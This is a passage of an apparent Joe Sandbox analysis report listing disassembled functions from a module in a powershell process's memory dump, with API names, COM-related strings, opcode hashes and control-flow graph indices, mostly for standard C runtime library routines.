                                                                                                                                                                                                                                                        • API String ID: 3215553584-3982473090
                                                                                                                                                                                                                                                        • Opcode ID: 1ebd598e7cc7fc5eb99bacab584d8bc6f5eb51cb3c2e89dffda0ca1dcb5588f9
                                                                                                                                                                                                                                                        • Instruction ID: 7d5dbcd2e9e41eb662e244bcee495787e7ab9e46246a67c1bd39ff88d0fd8d46
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ebd598e7cc7fc5eb99bacab584d8bc6f5eb51cb3c2e89dffda0ca1dcb5588f9
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 926154F290C242CAE7648E34C054ABC37B0EF0AB59F241136CA5A476D9CF3DE685D60D
                                                                                                                                                                                                                                                        Function 00007FFB08154280 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 168COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 457 7ffb08154280-7ffb081542a5 458 7ffb081542bf-7ffb081542c3 457->458 459 7ffb081542a7-7ffb081542ba call 7ffb08158b50 call 7ffb08158800 457->459 458->459 461 7ffb081542c5-7ffb081542d2 458->461 466 7ffb081544c6-7ffb081544e0 459->466 463 7ffb081542d8-7ffb081542e2 461->463 464 7ffb081544c3 461->464 465 7ffb081542e6-7ffb081542ec 463->465 464->466 468 7ffb08154497-7ffb081544a5 465->468 470 7ffb081542f1-7ffb081542f9 468->470 471 7ffb081544ab 468->471 472 7ffb081542ff-7ffb0815430e 470->472 473 7ffb081544b0-7ffb081544bd 470->473 471->473 474 7ffb0815431f 472->474 475 7ffb08154310-7ffb0815431d 472->475 473->464 473->465 476 7ffb08154321-7ffb08154332 474->476 475->476 477 7ffb081544e1-7ffb081544ec call 7ffb08158b50 call 7ffb08158800 476->477 478 7ffb08154338-7ffb0815433a 476->478 497 7ffb081544f1-7ffb081544f3 477->497 479 7ffb08154340-7ffb08154343 478->479 480 7ffb08154447-7ffb08154460 478->480 482 7ffb08154349-7ffb0815434c 479->482 483 7ffb08154433-7ffb08154445 479->483 485 7ffb0815446f-7ffb0815447a call 7ffb0815a44c 480->485 486 7ffb08154462-7ffb0815446d 480->486 487 7ffb08154352-7ffb08154355 482->487 488 7ffb081543f4-7ffb081543fb 482->488 483->468 498 7ffb0815447f-7ffb08154487 485->498 486->485 490 7ffb0815448e 486->490 495 7ffb081543c2-7ffb081543c7 487->495 496 7ffb08154357-7ffb0815435a 487->496 492 7ffb0815442d-7ffb08154431 488->492 493 7ffb081543fd-7ffb08154400 488->493 494 7ffb08154491 490->494 492->468 499 7ffb08154402-7ffb08154405 493->499 500 7ffb08154427-7ffb0815442b 493->500 501 7ffb08154493-7ffb08154495 494->501 504 7ffb081543cf-7ffb081543e0 495->504 505 7ffb081543c9-7ffb081543cd 495->505 502 7ffb0815435c-7ffb0815435f 496->502 503 7ffb081543ba-7ffb081543bd 496->503 497->466 498->490 506 7ffb08154489-7ffb0815448c 498->506 507 7ffb08154421-7ffb08154425 499->507 508 7ffb08154407-7ffb0815440a 499->508 500->468 501->468 501->497 509 7ffb08154361-7ffb08154364 502->509 510 7ffb08154389-7ffb0815438e 502->510 503->468 504->494 512 7ffb081543e6-7ffb081543ef 504->512 511 7ffb08154394-7ffb0815439c call 7ffb08153dec 505->511 506->494 507->468 513 7ffb0815441b-7ffb0815441f 508->513 514 7ffb0815440c-7ffb0815440f 508->514 518 7ffb0815437c-7ffb08154384 call 7ffb08154a00 509->518 519 7ffb08154366-7ffb08154369 509->519 515 7ffb08154390 510->515 516 7ffb081543a1-7ffb081543b5 510->516 511->501 512->494 513->468 514->468 521 7ffb08154415-7ffb08154419 514->521 515->511 516->494 518->501 519->497 523 7ffb0815436f-7ffb08154372 call 7ffb0815509c 519->523 521->468 526 7ffb08154377 523->526 526->501
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                        • String ID: *
                                                                                                                                                                                                                                                        • API String ID: 3215553584-163128923
                                                                                                                                                                                                                                                        • Opcode ID: aa6c6d05067df4c1974030299e81515d22a1ef8fb30acb083739680e8938d924
                                                                                                                                                                                                                                                        • Instruction ID: 72ae47879aca274e4664bec22a6ea31b257af3b6e139315cc607b1b13330fb13
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa6c6d05067df4c1974030299e81515d22a1ef8fb30acb083739680e8938d924
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 00715CF6948222C6E7688F39C04483D3BA4FF49F48F241135DA4A46698DF39EAC1D75D
                                                                                                                                                                                                                                                        Function 00007FFB0815AA14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileHandleType
                                                                                                                                                                                                                                                        • String ID: @
                                                                                                                                                                                                                                                        • API String ID: 3000768030-2766056989
                                                                                                                                                                                                                                                        • Opcode ID: aec4a7d795a12ce6e3c2edf64a3d87e3e37862e41d1e9a9c194e121883c62398
                                                                                                                                                                                                                                                        • Instruction ID: 07a7f92b074a5ed49f058db919bada87828d7041c5af75651182322bc710cfd0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aec4a7d795a12ce6e3c2edf64a3d87e3e37862e41d1e9a9c194e121883c62398
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B32195B2A58B62C5EB608B34E5909392751EF8D7B4F281335D66E077D8CE3CDA81C344
                                                                                                                                                                                                                                                        Function 00007FFB08151870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53memoryCOMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocGlobal_vfwprintf_lfwprintf
                                                                                                                                                                                                                                                        • String ID: classCreateInstance
                                                                                                                                                                                                                                                        • API String ID: 2573950011-4089175763
                                                                                                                                                                                                                                                        • Opcode ID: 456a6389ff28163a285efdd0dd03c523163046469584a6b06cd92e26aebfc0a2
                                                                                                                                                                                                                                                        • Instruction ID: dd5679d7b80d085c9b25eae09f3b2860bb13ec7e510c59161f688faa35173d23
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 456a6389ff28163a285efdd0dd03c523163046469584a6b06cd92e26aebfc0a2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3F310AB291CB45D6E7218B25E44472AB7A0FB8C798F404135EACD42BA8CF7CD694CB48
                                                                                                                                                                                                                                                        Function 00007FFB081516B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Virtual$AllocFree_vfwprintf_lfwprintf
                                                                                                                                                                                                                                                        • String ID: Unable to get App name
                                                                                                                                                                                                                                                        • API String ID: 4262229807-1516077376
                                                                                                                                                                                                                                                        • Opcode ID: 5707b00cc2293a4a3dfd3caee8717484271554e2491082096617d85a88014756
                                                                                                                                                                                                                                                        • Instruction ID: 530fea3ad7e2aff8400f332b357b6bcab07a85e830faefb82c91cd0efac4858a
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5707b00cc2293a4a3dfd3caee8717484271554e2491082096617d85a88014756
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BA2119B291CA41D2E661DB25E48076AB7A1FBC8B84F104135FACE47BA9CF3CD641CB44
                                                                                                                                                                                                                                                        Function 00007FFB081513F0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeGlobal_vfwprintf_lfwprintf
                                                                                                                                                                                                                                                        • String ID: Release
                                                                                                                                                                                                                                                        • API String ID: 1528719635-2822328095
                                                                                                                                                                                                                                                        • Opcode ID: 4c7f4c0ad56ef12b7856a332018986fbda30e4cd40ae75f356e598485e837a67
                                                                                                                                                                                                                                                        • Instruction ID: 02b345b797cdc95773ec264be3ec0d5688e966a5ce80e3ebc2f546a8197c2f5f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c7f4c0ad56ef12b7856a332018986fbda30e4cd40ae75f356e598485e837a67
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5101DBB6908A46D6D721DB24E48076AB7B0FB8C788F544135E78D43764DF3CDA84CB48
                                                                                                                                                                                                                                                        Function 00007FFB081521EC Relevance: 4.5, APIs: 3, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • __isa_available_init.LIBCMT ref: 00007FFB08152209
                                                                                                                                                                                                                                                        • __vcrt_initialize.LIBVCRUNTIME ref: 00007FFB0815220E
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08152C04: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FFB08152C08
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08152C04: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FFB08152C0D
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08152C04: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FFB08152C12
                                                                                                                                                                                                                                                        • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FFB08152226
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3388242289-0
                                                                                                                                                                                                                                                        • Opcode ID: b04083bfe4a3314fd4c45e802062aaf6ebeae827e6bbd1fd1de04fe2f6489d44
                                                                                                                                                                                                                                                        • Instruction ID: e1f4c0f2d2b26c910624a0ee3e5f026c8a68176743015a974f781441636942b0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b04083bfe4a3314fd4c45e802062aaf6ebeae827e6bbd1fd1de04fe2f6489d44
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 93E01AD6D0D286C4FE692675A492EB912500F2E300F1414B9D9AD835C38D2DF68AE63C
                                                                                                                                                                                                                                                        Function 00007FFB08151000 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 33COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _vfwprintf_lfwprintf
                                                                                                                                                                                                                                                        • String ID: DllGetClassObject
                                                                                                                                                                                                                                                        • API String ID: 2016306362-2359037521
                                                                                                                                                                                                                                                        • Opcode ID: 8862d6fb2f5f0c5398b0a600453551bc4b046de25d8692db24b61474aa3947e0
                                                                                                                                                                                                                                                        • Instruction ID: 543d7540deed5a4da8ce7abcbe8eea4299e0d587ab1b0439723b5936d5fca946
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8862d6fb2f5f0c5398b0a600453551bc4b046de25d8692db24b61474aa3947e0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0111F7B290CB42D1E6219B24E48076AB761FF8C794F500535EA8C47A69DF7CD694CB48
                                                                                                                                                                                                                                                        Function 00007FFB08151300 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _vfwprintf_lfwprintf
                                                                                                                                                                                                                                                        • String ID: QueryInterface
                                                                                                                                                                                                                                                        • API String ID: 2016306362-3068775669
                                                                                                                                                                                                                                                        • Opcode ID: 2c6518615ecabc39ad170691546afb1da107c06992e5aa06843b726721bcf438
                                                                                                                                                                                                                                                        • Instruction ID: aa6227d8168d75ba988212fd0b5a01769584e75969e32b1908a4079b03d2cfef
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2c6518615ecabc39ad170691546afb1da107c06992e5aa06843b726721bcf438
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6DF0B2A6508B81C2DA21EB25E49436EB3B0FBC8B94F504135EACD47B69CF7CC694CB44
                                                                                                                                                                                                                                                        Function 00007FFB08151380 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _vfwprintf_lfwprintf
                                                                                                                                                                                                                                                        • String ID: AddRef
                                                                                                                                                                                                                                                        • API String ID: 2016306362-2091767471
                                                                                                                                                                                                                                                        • Opcode ID: 1fed3c064308c45c119cda0d63361d667b7a9d1ce5c0acbd834afb132e1a5bb1
                                                                                                                                                                                                                                                        • Instruction ID: 691a193e60936eef032af946f01d7f84e0538ae4722acddee636afa69a72d923
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1fed3c064308c45c119cda0d63361d667b7a9d1ce5c0acbd834afb132e1a5bb1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9AF0F9B6908A41C6D671DB28E48075ABBB0FBCC794F144135E68D83B69CE3CDA84CB08
                                                                                                                                                                                                                                                        Function 00007FFB08151640 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 21COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08151150: GetCurrentProcessId.KERNEL32 ref: 00007FFB08151181
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08151150: GetCurrentProcessId.KERNEL32 ref: 00007FFB0815118B
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08151150: fwprintf.LIBCONCRTD ref: 00007FFB081511AA
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08151150: fwprintf.LIBCONCRTD ref: 00007FFB08151200
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08151150: fwprintf.LIBCONCRTD ref: 00007FFB08151241
                                                                                                                                                                                                                                                        • fwprintf.LIBCONCRTD ref: 00007FFB0815168F
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB08151C50: _vfwprintf_l.LIBCONCRTD ref: 00007FFB08151C84
                                                                                                                                                                                                                                                          • Part of subcall function 00007FFB081567B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FFB081567D9
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: fwprintf$CurrentProcess$_invalid_parameter_noinfo_vfwprintf_l
                                                                                                                                                                                                                                                        • String ID: %s
                                                                                                                                                                                                                                                        • API String ID: 942402463-620797490
                                                                                                                                                                                                                                                        • Opcode ID: d94f51237572768df14abc18b34a3042b2fceefa9af9b7675cbdccc91a3107b1
                                                                                                                                                                                                                                                        • Instruction ID: c2c63f27e00bbbff9e279fa0fdcfa54713b6391a372cc720adb7a7f91841cf00
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d94f51237572768df14abc18b34a3042b2fceefa9af9b7675cbdccc91a3107b1
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 94F0A4B2908B85C1D621DB25F48165AB7B4FBD8784F504625EACC43B69DF7CC264CB44
                                                                                                                                                                                                                                                        Function 00007FFB08151480 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000008.00000002.1409327638.00007FFB08151000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFB08150000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409310316.00007FFB08150000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409415068.00007FFB08166000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409470673.00007FFB08170000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08172000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000008.00000002.1409494595.00007FFB08175000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_8_2_7ffb08150000_powershell.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _vfwprintf_lfwprintf
                                                                                                                                                                                                                                                        • String ID: DisplayName
                                                                                                                                                                                                                                                        • API String ID: 2016306362-3562400126
                                                                                                                                                                                                                                                        • Opcode ID: 7108dfb2905e57c5ccf3285aead675e2830a3c8eb5fa42f24430b3609d73e426
                                                                                                                                                                                                                                                        • Instruction ID: 756b36c2e43feb0eaee716a88f397ff22930eab1e662dfe474ef8d799c8502c7
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7108dfb2905e57c5ccf3285aead675e2830a3c8eb5fa42f24430b3609d73e426
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 88E0EDA291CA81D1D621EB34F44576A73A0FF8C384F404635E6CD816A5DF7CD354CA08
                                                                                                                                                                                                                                                        Function 00007FFB0816099C Relevance: 3.1, APIs: 2, Instructions: 74fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
